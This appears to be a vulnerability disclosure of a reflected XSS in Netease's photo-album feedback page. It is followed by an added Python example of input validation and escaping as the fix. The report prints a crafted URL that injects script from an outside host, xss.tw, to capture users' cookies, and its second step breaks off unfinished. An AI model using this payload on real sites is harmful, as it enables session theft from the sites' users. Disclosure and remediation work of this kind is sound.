The Netease photo album user feedback page has a reflected XSS, so a user's cookies can easily be obtained. I have already submitted this document. I am hereby submitting the document because I have not provided any proof of case...
1. In the Netease album user feedback area, ask a question and then open your own question. The request parameters are not filtered on this page, which results in XSS. The constructed URL is as follows:
http://fankui.163.com/ft/question.fb?Pid=3&cid=33518918&type=0&pno=1%22%3E%3Cimg%20src=1%20onerror=%22alert%28/xss/%29%22%3E%3Cscript%20src=http://xss.tw/762%3Ealert%281%29%3C/script%3E
There are two XSS trigger points, which you can also see in the page source code.
2. Because the constructed URL is too long, you can use a shortened URL. If you do not know which user the cookie belongs to, log on to the system as follows:
Solution:
Filter!
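What "filter" means in practice for a parameter like pno, as an added example that is not Netease's code: validate the value by type, then encode it for the context it is written into. The template, the function names and the host fankui.example are hypothetical, and the example assumes pno is echoed into an HTML attribute, which the page does not state.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Hypothetical template fragment: pno is echoed into an attribute value.
TEMPLATE = '<a href="question.fb?pno={pno}">next page</a>'


def get_param(url: str, name: str, default: str = "1") -> str:
    """Return the URL-decoded value of one query parameter."""
    return parse_qs(urlsplit(url).query).get(name, [default])[0]


def render_unfiltered(url: str) -> str:
    """The 'before': the decoded parameter is written into the page verbatim."""
    return TEMPLATE.format(pno=get_param(url, "pno"))


def parse_page_number(raw: str, default: int = 1, maximum: int = 100000) -> int:
    """Allow-list validation: a page number is ASCII digits within a range."""
    if raw.isascii() and raw.isdigit() and len(raw) <= 6:
        value = int(raw)
        if 1 <= value <= maximum:
            return value
    return default


def escape_text_field(value: str) -> str:
    """For parameters that must stay free text: encode <, >, & and both quotes."""
    return html.escape(value, quote=True)


def render_filtered(url: str) -> str:
    """The 'after': validate by type, then encode for the attribute context."""
    pno = parse_page_number(get_param(url, "pno"))
    # Encoding an int is redundant, but it keeps the output safe if the
    # template later echoes a free-text parameter through the same path.
    return TEMPLATE.format(pno=escape_text_field(str(pno)))


# Constructed sample: the query shape from the report with a harmless marker.
SAMPLE = ("http://fankui.example/ft/question.fb?pid=3&type=0"
          "&pno=1%22%3E%3Cimg%20src=1%20onerror=%22alert(1)%22%3E")

if __name__ == "__main__":
    print(render_unfiltered(SAMPLE))  # markup breaks out of the attribute
    print(render_filtered(SAMPLE))    # pno falls back to the default page
```

Setting the HttpOnly attribute on session cookies is a separate measure that limits cookie access from script; it does not replace the validation and encoding above.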